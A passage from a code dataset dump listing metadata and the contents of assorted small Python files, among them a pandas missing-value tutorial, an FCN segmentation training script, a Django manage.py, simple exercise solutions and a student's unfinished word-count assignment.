blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2fc54fdb33564c85093d3c1ade8519f47bef85fa
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02553/s438652342.py
|
82c198767ca5b7f4168c3c85266ada4096dd8b62
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 88 |
py
|
a, b, c, d = [int(e) for e in input().split(" ")]
print(max((a*c), (a*d), (b*c), (b*d)))
|
[
"[email protected]"
] | |
5cdc3d8fc2d6064c8aed7bcf1fc396041a3ef2a1
|
ff6248be9573caec94bea0fa2b1e4b6bf0aa682b
|
/StudentProblem/10.21.11.2/1/1569578564.py
|
a178fed62c1e5d05670590176c94822f3406337d
|
[] |
no_license
|
LennartElbe/codeEvo
|
0e41b1a7705204e934ef71a5a28c047366c10f71
|
e89b329bc9edd37d5d9986f07ca8a63d50686882
|
refs/heads/master
| 2020-12-21T17:28:25.150352 | 2020-03-26T10:22:35 | 2020-03-26T10:22:35 | 236,498,032 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,645 |
py
|
import functools
import typing
import string
import random
import pytest
## Lösung Teil 1.
def nwords(s: str) -> n:
""" Funktion berechnet zu einem String Argument s die Anzahl der Worte im String.
args: string
returns: n
"""
n = 0
for i in (len(str)): #looping "abc abc"
if s[i] is string.whitespace:
n+=1 #code fehlerhaft, bei mehreren whitespaces
return n
## Lösung Teil 2.
def word_count_iter(it: iter) -> tuple:
""" Funktion nimmt iterierbares Argument , das bei jeder Iteration eine Zeile (einen String) liefert
Funktion liefert als Ergebnis ein Tupel aus der Anzahl der Zeilen, der Anzahl der Worte und der Anzahl der Zeichen,
die aus dem Argument gelesen worden sind.
Args: it iterierbares Objekt
Returns: t ein Tupel
"""
t=(,,)
pass
######################################################################
## Lösung Teil 3. (Tests)
def test_word_counter_iter():
assert word_count_iter("abc abc") == (,,)
assert word_count_iter("") == (,,)
assert word_count_iter("abc abc") == (,,)
## revert
try:
word_count_iter = word_count_iter.__wrapped__
except:
pass
## Lösung Teil 4.
def word_count(f: file) -> tuple:
"""
Funktion word_count nimmt einen Dateinamen f als Argument und liefert als Ergebnis ein Tupel aus der Anzahl der Zeilen,
der Anzahl der Worte und der Anzahl der Zeichen , die aus der zugehörigen Datei gelesen worden sind.
Args: f einen Dateinamen
Returns: tuple
"""
pass
######################################################################
|
[
"[email protected]"
] | |
3f038c912cdab138dfec0d40cf9f50af36ae68e9
|
e98f3960d0465c91ec1e39272a49ce5ce4496708
|
/src/ecldoc/parseDoc.py
|
b422e00207890399779faefac982fe2ebc84ceb4
|
[] |
no_license
|
successar/ecldoc
|
7336c26291e68663e4bc739ab891f521724245cf
|
c7c7458c1bafb2bf9563a082fc05da5f64ef0a2e
|
refs/heads/master
| 2021-01-14T08:22:04.824906 | 2017-08-12T12:02:19 | 2017-08-12T12:02:19 | 81,946,670 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,712 |
py
|
import re
from lxml import etree
import lxml.html as H
from collections import defaultdict
def parseDocstring(docstring) :
'''
Parse Docstring as returned by eclcc,
break into individual tags and
return them as XML Elements
'''
docstring = re.sub(r'\n\s*\*', '\n', docstring)
docstring = re.sub(r'\r', ' ', docstring)
docstring = docstring.strip().split('\n')
docdict = defaultdict(list)
current_tag = 'content'
current_text = ''
for line in docstring :
is_tag = re.search(r'^\s*@', line)
if is_tag :
if current_tag == 'content' :
docdict['firstline'] = [findFirstLine(current_text)]
docdict[current_tag].append(current_text.strip())
line = re.split(r'\s', line.lstrip(), maxsplit=1)
tag = line[0][1:]
text = line[1]
current_tag = tag
current_text = text + '\n'
else :
current_text += line + '\n'
if current_tag == 'content' :
docdict['firstline'] = [findFirstLine(current_text)]
docdict[current_tag].append(current_text.strip())
for tag in docdict :
for i, desc in enumerate(docdict[tag]) :
root = H.fragment_fromstring(desc, create_parent='div')
removeWS(root)
content = etree.Element(tag)
content.text = etree.tostring(root)
content.text = re.sub(r'^<div>', '', content.text)
content.text = re.sub(r'</div>$', '', content.text)
docdict[tag][i] = content
return docdict
def removeWS(element) :
'''
Format Whitespace in HTML elements in docstring
coming from parsed XML Output of ECL File
'''
if element.tag == 'pre' :
lines = element.text.split('\n')
element.text = lines[0]
for line in lines[1:] :
br = etree.Element('br')
br.tail = line
element.append(br)
return
if element.text is not None :
element.text = re.sub(r'\s+', ' ', element.text)
for e in element.iterchildren() :
if e.tail :
e.tail = re.sub(r'\s+', ' ', e.tail)
removeWS(e)
def findFirstLine(current_text) :
'''
Find First line in docstring content section to be used as caption
in TOC and Tree
'''
split_1 = re.split(r'\.\s|\.$', current_text.strip(), maxsplit=1)
if len(split_1) == 2 :
return split_1[0].strip()
split_2 = re.split(r'\n', current_text.strip(), maxsplit=1)
return split_2[0].strip()
##########################################################
def construct_type(ele) :
'''
Parse Type Tree into single string representation
'''
if ele is None : return ''
if type(ele) == list : return ''
typestring = ''
attribs = ele.attrib
typename = attribs['type']
if typename == 'record' :
if 'unnamed' in attribs :
typestring += '{ '
fields = []
for field in ele.findall('Field') :
fields.append(construct_type(field.find('./Type')) + " " + field.attrib['name'])
typestring += ' , '.join(fields) + ' }'
else :
typestring += attribs['origfn'] if 'origfn' in attribs else attribs['name']
else :
typestring += typename.upper()
if 'origfn' in attribs :
typestring += ' ( ' + attribs['origfn'] + ' )'
elif 'name' in attribs :
typestring += ' ( ' + attribs['name'] + ' )'
if typename == 'function' :
typestring += ' [ '
params = []
for p in ele.find('Params').findall('Type') :
params.append(construct_type(p))
typestring += ' , '.join(params) + ' ]'
if ele.find('./Type') is not None :
typestring += ' ( ' + construct_type(ele.find('./Type')) + ' )'
return typestring
##########################################################
def cleansign(text) :
'''
Remove irrelevant prefix and suffixes from signature
'''
text = re.sub(r'^export', '', text, flags=re.I)
text = re.sub(r'^shared', '', text, flags=re.I)
text = re.sub(r':=$', '', text, flags=re.I)
text = re.sub(r';$', '', text, flags=re.I)
text = re.sub(r'\s+', ' ', text.strip())
return text
def breaksign(name, text) :
'''
Heuristically break signature of ECL Definition
recovered from ecl file into "return name (Paramters)"
'''
name = name.lower()
string = ' ' + text.lower() + ' '
pos = 1
open_bracks = ['{', '(', '[']
close_bracks = ['}', ')', ']']
stack = []
ret, param = '', ''
indent_len = 0
name_len = len(name)
for i in range(1, len(string)) :
c = string[i]
if c in open_bracks :
stack.append(c)
elif c in close_bracks :
if stack[-1] == open_bracks[close_bracks.index(c)] :
stack = stack[:-1]
else :
if len(stack) == 0 :
m = re.match(r'[\s\)]' + name + r'([^0-9A-Za-z_])', string[pos-1:])
if m :
pos = pos - 1
ret = text[:pos]
param = text[pos + name_len:]
indent_len = pos + name_len
break
pos += 1
return ret.strip(), param.strip(), indent_len
##########################################################
def getTags(doc) :
'''
Convert XML Documentation (generated using parseDocstring)
back to JSON (ie Python Dictionary)
'''
tag_dict = defaultdict(list)
if doc is None : return tag_dict
for child in doc.getchildren() :
tag_dict[child.tag].append(child.text)
return tag_dict
|
[
"[email protected]"
] | |
de2e4a9bf1208d0184327f19cfd432928ffbfdde
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/dcFp6EuCm8J2HNKFG_21.py
|
75a6a5b07dd4596969ad89d81d4ceb4d5cc5bf5a
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 173 |
py
|
def func(lst):
global res
res = 0
fun(lst)
return res
def fun(lst):
global res
if isinstance(lst,list):
res += len(lst)
for l in lst:
fun(l)
|
[
"[email protected]"
] | |
0c9ef5dcdc3f510c6972175e849cf43b3caee43c
|
651a296c8f45b5799781fd78a6b5329effe702a0
|
/c8lib/c8vec_uniform_01.py
|
f77127fe01f76857c299aa377e44b3252af5e4c8
|
[] |
no_license
|
pdhhiep/Computation_using_Python
|
095d14370fe1a01a192d7e44fcc81a52655f652b
|
407ed29fddc267950e9860b8bbd1e038f0387c97
|
refs/heads/master
| 2021-05-29T12:35:12.630232 | 2015-06-27T01:05:17 | 2015-06-27T01:05:17 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,367 |
py
|
#!/usr/bin/env python
def c8vec_uniform_01 ( n, seed ):
#*****************************************************************************80
#
## C8VEC_UNIFORM_01 returns a unit pseudorandom C8VEC.
#
# Discussion:
#
# The angles should be uniformly distributed between 0 and 2 * PI,
# the square roots of the radius uniformly distributed between 0 and 1.
#
# This results in a uniform distribution of values in the unit circle.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 06 April 2013
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Paul Bratley, Bennett Fox, Linus Schrage,
# A Guide to Simulation,
# Second Edition,
# Springer, 1987,
# ISBN: 0387964673,
# LC: QA76.9.C65.B73.
#
# Bennett Fox,
# Algorithm 647:
# Implementation and Relative Efficiency of Quasirandom
# Sequence Generators,
# ACM Transactions on Mathematical Software,
# Volume 12, Number 4, December 1986, pages 362-376.
#
# Pierre L'Ecuyer,
# Random Number Generation,
# in Handbook of Simulation,
# edited by Jerry Banks,
# Wiley, 1998,
# ISBN: 0471134031,
# LC: T57.62.H37.
#
# Peter Lewis, Allen Goodman, James Miller,
# A Pseudo-Random Number Generator for the System/360,
# IBM Systems Journal,
# Volume 8, Number 2, 1969, pages 136-143.
#
# Parameters:
#
# Input, integer N, the number of values to compute.
#
# Input, integer SEED, a seed for the random number generator.
#
# Output, complex C(N), the pseudorandom complex vector.
#
# Output, integer SEED, a seed for the random number generator.
#
import numpy
from math import cos, floor, pi, sin, sqrt
from sys import exit
i4_huge = 2147483647
seed = floor ( seed )
if ( seed < 0 ):
seed = seed + i4_huge
if ( seed == 0 ):
print ''
print 'C8VEC_UNIFORM_01 - Fatal error!'
print ' Input SEED = 0!'
exit ( 'C8VEC_UNIFORM_01 - Fatal error!' )
c = numpy.zeros ( n, 'complex' )
for j in range ( 0, n ):
k = floor ( seed / 127773 )
seed = 16807 * ( seed - k * 127773 ) - k * 2836
if ( seed < 0 ):
seed = seed + i4_huge
r = sqrt ( seed * 4.656612875E-10 )
k = floor ( seed / 127773 )
seed = 16807 * ( seed - k * 127773 ) - k * 2836
if ( seed < 0 ):
seed = seed + i4_huge
theta = 2.0 * pi * seed * 4.656612875E-10
c[j] = r * complex ( cos ( theta ), sin ( theta ) )
return c, seed
def c8vec_uniform_01_test ( ):
#*****************************************************************************80
#
## C8VEC_UNIFORM_01_TEST tests C8VEC_UNIFORM_01.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 06 April 2013
#
# Author:
#
# John Burkardt
#
seed = 123456789
print ''
print 'C8VEC_UNIFORM_01_TEST'
print ' C8VEC_UNIFORM_01 computes pseudorandom complex values'
print ' in the unit circle.'
print ''
print ' The initial seed is %d' % ( seed )
print ''
n = 10
[ x, seed ] = c8vec_uniform_01 ( n, seed )
for i in range ( 0, n ):
print ' %6d ( %f, %f )' % ( i, x[i].real, x[i].imag )
print ''
print 'C8VEC_UNIFORM_01_TEST:'
print ' Normal end of execution.'
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
c8vec_uniform_01_test ( )
timestamp ( )
|
[
"[email protected]"
] | |
a4109108ce79ce8ffa413a457964c2fc31fa84dd
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/6NoaFGKJgRW6oXhLC_20.py
|
b805a8bd5efdd4230470dd426cbebc9d41b4ae6f
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 270 |
py
|
def sum_of_vowels(txt):
count = 0
txt = txt.upper()
for x in txt:
if x == "A":
count += 4
elif x == "E":
count += 3
elif x == "I":
count += 1
else:
count += 0
return count
|
[
"[email protected]"
] | |
c890c2a824190f02edfa382c7de2388243c80273
|
d99e73252210d9ab5dea0b46d2f82f8a036373ce
|
/scripts/rawFoldTime.py
|
ee6e0616d95093414fa34bdc91064d3e9dc32732
|
[] |
no_license
|
schwancr/schwancr_bin
|
710378ebca8482b1e4e38be894a22349e808e18a
|
fb42d40ac7be4b9984c257c09b569d740926781a
|
refs/heads/master
| 2016-08-04T23:36:29.658194 | 2015-06-30T18:26:04 | 2015-06-30T18:26:04 | 7,841,529 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,813 |
py
|
#!/usr/bin/env python
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-p',dest='proj_FN',default='../ProjectInfo.h5',help='ProjectInfo.h5 from msmbuilder [ ../ProjectInfo.h5 ]')
parser.add_option('-d',dest='data_FN',help='Data to use as a metric for folded and unfolded states' )
parser.add_option('--fc', dest='f_cut',type=float,help='Folded cutoff')
parser.add_option('--uc',dest='u_cut',type=float,help='Unfolded cutoff')
parser.add_option('--low-is-folded',dest='low_is_folded',default=False,action='store_true',help='Pass this flag if a small number means the conformation is folded (i.e. RMSD)')
parser.add_option('-o',dest='out_FN',default='Fold_Unfold_Times.pdf',help='Output file to write to')
options, args = parser.parse_args()
from numpy import *
from msmbuilder import Project
from pyschwancr import dataIO, msmTools
import os, sys, re
import matplotlib
matplotlib.use('pdf')
from matplotlib.pyplot import *
from scipy import optimize
Proj = Project.Project.LoadFromHDF( options.proj_FN )
Data = dataIO.readData( options.data_FN )
# first reshape the data into trajectories.
Lens = Proj['TrajLengths']
Trajs = []
sum = 0
for i in range( len( Lens ) ):
Trajs.append( Data[ sum : sum + Lens[i] ] )
sum += Lens[i]
Folds = []
Unfolds = []
for traj in Trajs:
(a,b) = msmTools.calcRawFoldTime( traj, options.f_cut, options.u_cut, low_is_folded = options.low_is_folded )
Folds.extend( a )
Unfolds.extend( b )
#FoldsDist = bincount( Folds )
#UnfoldsDist = bincount( Unfolds )
figure()
subplot(211)
foldHist = hist( Folds, bins=100, color = 'blue', label='Fold' )
vlines( mean( Folds ), 0, ylim()[1], color = 'black', linewidth=3 )
ylabel('Frequency')
legend()
xFolds = xlim()
subplot(212)
unfoldHist = hist( Unfolds, bins=100, color = 'red', label='Unfold' )
vlines( mean( Unfolds), 0, ylim()[1], color = 'black', linewidth=3 )
ylabel('Frequency')
legend()
xUnfolds = xlim()
xlabel('Fold/Unfold Times (frames)')
suptitle('Distribution of Folding/Unfolding times')
subplot(211)
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
text( xlim()[1] * 0.3, ylim()[1] * 0.8, 'Mean = %.2f\nN = %d' % ( mean( Folds ), len( Folds ) ) )
yLimF = ylim()
subplot(212)
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
text( xlim()[1] * 0.3, ylim()[1] * 0.8, 'Mean = %.2f\nN = %d' % ( mean( Unfolds ), len( Unfolds ) ) )
yLimU = ylim()
savefig( options.out_FN )
yFold = foldHist[0]
xFold = array( [ ( foldHist[1][i+1] + foldHist[1][i] ) / 2. for i in range( len( foldHist[0] ) ) ] )
yUnfold = unfoldHist[0]
xUnfold = array( [ ( unfoldHist[1][i+1] + unfoldHist[1][i] ) / 2. for i in range( len( unfoldHist[0] ) ) ] )
expFit = lambda p, x : p[0] * exp( - p[1] * x )
powFit = lambda p, x : p[0] * x ** ( - p[1] )
errExp = lambda p, x, y : expFit( p, x ) - y
errPow = lambda p, x, y : powFit( p, x ) - y
foldExp = optimize.leastsq( errExp, x0 = [100,0.001], args = ( xFold, yFold ), maxfev = 1000000 )
foldPow = optimize.leastsq( errPow, x0 = [1,1], args = ( xFold, yFold ), maxfev = 1000000 )
unfoldExp = optimize.leastsq( errExp, x0 = [100,0.001], args = ( xUnfold, yUnfold ), maxfev = 1000000 )
unfoldPow = optimize.leastsq( errPow, x0 = [1,1], args = ( xUnfold, yUnfold ), maxfev = 1000000 )
SStot_F = ( ( yFold - yFold.mean() ) **2 ).sum()
SStot_U = ( ( yUnfold - yUnfold.mean() ) ** 2 ).sum()
SSerr_F_exp = ( ( yFold - expFit( foldExp[0], xFold ) ) ** 2 ).sum()
SSerr_F_pow = ( ( yFold - powFit( foldPow[0], xFold ) ) ** 2 ).sum()
SSerr_U_exp = ( ( yUnfold - expFit( unfoldExp[0], xUnfold ) ) ** 2 ).sum()
SSerr_U_pow = ( ( yUnfold - powFit( unfoldPow[0], xUnfold ) ) ** 2 ).sum()
R2_F_exp = 1 - SSerr_F_exp / SStot_F
R2_F_pow = 1 - SSerr_F_pow / SStot_F
R2_U_exp = 1 - SSerr_U_exp / SStot_U
R2_U_pow = 1 - SSerr_U_pow / SStot_U
figure()
xi = linspace( 1, max(xFolds[1], xUnfolds[1]), 1000 )
subplot(211)
scatter( xFold, yFold, color = 'blue', label='Fold Times' )
plot( xi, expFit( foldExp[0], xi ), color='purple', label='Exponential' )
plot( xi, powFit( foldPow[0], xi ), color='orange', label='Power Law' )
ylabel('Frequency')
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
ylim( yLimF )
text(0.3*xlim()[1], ylim()[1]*0.7, u"Exp: R\xb2 = %.4f\nPow: R\xb2 = %.4f" % ( R2_F_exp, R2_F_pow ) )
legend()
subplot(212)
scatter( xUnfold, yUnfold, color = 'red', label = 'Unfold Times' )
plot( xi, expFit( unfoldExp[0], xi ), color='purple', label='Exponential' )
plot( xi, powFit( unfoldPow[0], xi ), color='orange', label='Power Law' )
ylabel('Frequency')
xlim([ 0, max( xFolds[1], xUnfolds[1] ) ])
ylim( yLimU )
text(0.3*xlim()[1], ylim()[1]*0.7, u"Exp: R\xb2 = %.4f\nPow: R\xb2 = %.4f" % ( R2_U_exp, R2_U_pow ) )
legend()
suptitle('Fits of Distribution of Folding/Unfolding Times')
xlabel('Fold/Unfold Times (frames)')
savefig( options.out_FN[:-4] + 'FITS' + options.out_FN[-4:] )
|
[
"[email protected]"
] | |
eb08eed3392c1000edd7dfa16c3c1cbf171d51e6
|
0d8ee78f61660343e5feec41a53269dbf5585fa3
|
/Demo11/fill_nan.py
|
2705a3af2c26a7166ff0fe404b2b0e9ae7b01c2b
|
[] |
no_license
|
x-jeff/Python_Code_Demo
|
41b033f089fa19d8c63b2f26bf66ef379738c4ad
|
9bc458b08cfae0092e8f11a54031ca2e7017affc
|
refs/heads/master
| 2023-07-29T16:34:34.222620 | 2023-07-09T10:38:23 | 2023-07-09T10:38:23 | 176,306,727 | 7 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,954 |
py
|
import pandas as pd
import numpy as np
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87]])
df.columns=["Name","Gender","Age","Height","Weight"]
df["Salary"]=np.nan
print(df)
#使用数值2填补缺失值
print(df.fillna(2))
#使用平均值填补缺失值
df["Age"].fillna(df["Age"].mean())
print(df)
df["Age"].fillna(df["Age"].mean(),inplace=True)
print(df)
np.random.seed(1)
df=pd.DataFrame({"key1":list('aabba'),"key2":["one","two","one","two","one"],"data1":np.random.randn(5),"data2":np.random.randn(5)})
print(df)
#求分层平均数
grouped=df["data1"].groupby(df["key1"])
print(grouped.mean())
# df["data1"]=df["data1"].groupby(df["key1"]).transform("mean")#方法一
df["data1"]=df.groupby("key1")["data1"].transform("mean")#方法二
print(df)
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87],["Jim","M",23,np.nan,np.nan]])
df.columns=["Name","Gender","Age","Height","Weight"]
df["Salary"]=np.nan
print(df)
#用各性别年龄平均值填补缺失值
#方式一
df["Age"].fillna(df["Age"].groupby(df["Gender"]).transform("mean"),inplace=True)
print(df)
#方式二
df["Age"].fillna(df.groupby("Gender")["Age"].transform("mean"),inplace=True)
print(df)
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,np.nan],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87],["Jim","M",23,np.nan,np.nan]])
df.columns=["Name","Gender","Age","Height","Weight"]
print(df)
#向后填补缺失值
# df.fillna(method="pad",inplace=True)
# print(df)
#向前填补缺失值
# df.fillna(method="bfill",inplace=True)
# print(df)
#在向前填补缺失值时,只填补一行
df.fillna(method="bfill",inplace=True,limit=1)
print(df)
df=pd.DataFrame([[1,870],[2,900],[np.nan,np.nan],[4,950],[5,1000],[6,1200]])
df.columns=["Time","Value"]
print(df)
#使用内插法填补缺失值
print(df.interpolate())
|
[
"[email protected]"
] | |
e9b3f8973d911ceb5d48ec19e663a81368493195
|
f343b2ac4f5b52abd5e6a8fb6bef55acf3a32154
|
/solutions-BEWARE-DO-NOT-ENTER/week-4/takeHomeChallenge-palindrome.py
|
e4a2ccdfe7f0be3a40c21436e6c20987ccb1f2fa
|
[] |
no_license
|
asyrul21/recode-beginner-python
|
41248d59199ac3660ef40aa3a5fdf23fadfb6b5b
|
93608e2880aec1774e898d5f1a663dc84e246b46
|
refs/heads/master
| 2023-07-04T21:59:08.135443 | 2021-08-09T01:43:30 | 2021-08-09T01:43:30 | 330,307,505 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 944 |
py
|
# The palindrome Checker
# 1. create a varible named word and assign it to the input() statement you learned last week
# 2. Transform this word to all lowercase by performing word.lower()
# 3. Set a flag named Palindrom and set it to True
# 4. Setup a for loop with enumeration, and check that the current letter must
# be equals to the letter at the same position from the bacl
# 5. If this is not true, you may change Palindrom to False, and break from the loop
# 6. Finally, if Palindrome is True, output something. Else, output a different message.
print("Welcome to the Palindrome Checker")
print()
word1 = input("Insert a word: ")
word1 = word1.lower()
palindrome = True
for idx, letter in enumerate(word1):
if word1[idx] == word1[len(word1) - (idx + 1)]:
palindrome = True
else:
palindrome = False
break
print()
if(palindrome):
print("This is a palindrome!")
else:
print("Nope this is not.")
|
[
"[email protected]"
] | |
13a7dfa407470abb9ca3c605120da264d916ae5d
|
249c7081a766318360da21c66e7a30f917c90738
|
/exercicio 2.py
|
c4a34ba0a76bc805393dd0d3128c0d2ff7cc3088
|
[] |
no_license
|
Danlei27/PycharmProjects
|
b4d93a966b45c84f206498faa60c36f8b356c5a9
|
abedd9911d7a28f64366f4ea69de86ed16d39534
|
refs/heads/master
| 2020-05-30T10:32:55.793721 | 2019-06-01T00:33:27 | 2019-06-01T00:33:27 | 189,675,167 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 274 |
py
|
dia=input('dia')
mes=input('mes')
ano=input('ano')
cores = {'limpa':'\033[m',
'azul':'\033[34m',
'amarelo':'\033[33m',
'pretoebranco':'\033[7;30m'}
print('Você nasceu no dia' ,cores ['azul'],dia, 'do' ,mes, 'de' ,ano,cores['limpa'], '.correto?')
|
[
"[email protected]"
] | |
65235dd521308b51b04aee202f4a2e28bd864484
|
2a5d8aafddf6744b8ec5a025a1b908878a56d59d
|
/examples/voc/train_fcn16s.py
|
9c935715746c66f95eccf3a69ac092c5df8fd147
|
[] |
no_license
|
mrteera/pytorch-fcn
|
030e50657b48a4d43d02c8f0b1020ba15248b3db
|
449f92a26beb6bbd423e6fefce896ec96c944e16
|
refs/heads/master
| 2021-08-20T02:32:48.063375 | 2017-11-28T01:23:12 | 2017-11-28T01:23:12 | 112,288,341 | 2 | 0 | null | 2017-11-28T05:05:08 | 2017-11-28T05:05:08 | null |
UTF-8
|
Python
| false | false | 3,067 |
py
|
#!/usr/bin/env python
import argparse
import os
import os.path as osp
import torch
import torchfcn
from train_fcn32s import get_log_dir
from train_fcn32s import get_parameters
configurations = {
# same configuration as original work
# https://github.com/shelhamer/fcn.berkeleyvision.org
1: dict(
max_iteration=100000,
lr=1.0e-12,
momentum=0.99,
weight_decay=0.0005,
interval_validate=4000,
fcn32s_pretrained_model=torchfcn.models.FCN32s.download(),
)
}
here = osp.dirname(osp.abspath(__file__))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--gpu', type=int, required=True)
parser.add_argument('-c', '--config', type=int, default=1,
choices=configurations.keys())
parser.add_argument('--resume', help='Checkpoint path')
args = parser.parse_args()
gpu = args.gpu
cfg = configurations[args.config]
out = get_log_dir('fcn16s', args.config, cfg)
resume = args.resume
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu)
cuda = torch.cuda.is_available()
torch.manual_seed(1337)
if cuda:
torch.cuda.manual_seed(1337)
# 1. dataset
root = osp.expanduser('~/data/datasets')
kwargs = {'num_workers': 4, 'pin_memory': True} if cuda else {}
train_loader = torch.utils.data.DataLoader(
torchfcn.datasets.SBDClassSeg(root, split='train', transform=True),
batch_size=1, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(
torchfcn.datasets.VOC2011ClassSeg(
root, split='seg11valid', transform=True),
batch_size=1, shuffle=False, **kwargs)
# 2. model
model = torchfcn.models.FCN16s(n_class=21)
start_epoch = 0
start_iteration = 0
if resume:
checkpoint = torch.load(resume)
model.load_state_dict(checkpoint['model_state_dict'])
start_epoch = checkpoint['epoch']
start_iteration = checkpoint['iteration']
else:
fcn32s = torchfcn.models.FCN32s()
fcn32s.load_state_dict(torch.load(cfg['fcn32s_pretrained_model']))
model.copy_params_from_fcn32s(fcn32s)
if cuda:
model = model.cuda()
# 3. optimizer
optim = torch.optim.SGD(
[
{'params': get_parameters(model, bias=False)},
{'params': get_parameters(model, bias=True),
'lr': cfg['lr'] * 2, 'weight_decay': 0},
],
lr=cfg['lr'],
momentum=cfg['momentum'],
weight_decay=cfg['weight_decay'])
if resume:
optim.load_state_dict(checkpoint['optim_state_dict'])
trainer = torchfcn.Trainer(
cuda=cuda,
model=model,
optimizer=optim,
train_loader=train_loader,
val_loader=val_loader,
out=out,
max_iter=cfg['max_iteration'],
interval_validate=cfg.get('interval_validate', len(train_loader)),
)
trainer.epoch = start_epoch
trainer.iteration = start_iteration
trainer.train()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
b3fca3d8347c9eca93b76398de109317a0a9a702
|
144f5e7480d12bb617928d1f248db3c969e7469e
|
/manage.py
|
216e8b83633cd376c5b286885dac519047de9fae
|
[] |
no_license
|
eng-olavo/HelloWorldUdemy
|
0c4b66315be350c431ba4c5395a71aa5f5edf5e1
|
bf9b78e82e2ae5c2055dd72a1a6b55520896c86f
|
refs/heads/master
| 2023-07-10T09:26:43.174027 | 2021-08-25T11:44:29 | 2021-08-25T11:44:29 | 399,786,000 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 671 |
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'HelloWorldUdemy.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
cc835a2e423f86342cc8680a183f393ecf36c646
|
78a15793be1ba71ea7eecee33abef4ecbe11d8f2
|
/apps/tasks/migrations/0007_task_prototype.py
|
8aaf0c000b7bb98be1e6a4e5e5a008f2ba9330e0
|
[] |
no_license
|
teresaylin/my2009
|
f5df9c62492d4c88931f6aa45af31ee88dbe3a1a
|
2486750ad73df313d596497b0eb7f4c47518e6a6
|
refs/heads/master
| 2021-03-21T23:53:55.581074 | 2016-06-01T18:13:44 | 2016-06-01T18:13:44 | 23,392,283 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 490 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20150112_1549'),
]
operations = [
migrations.AddField(
model_name='task',
name='prototype',
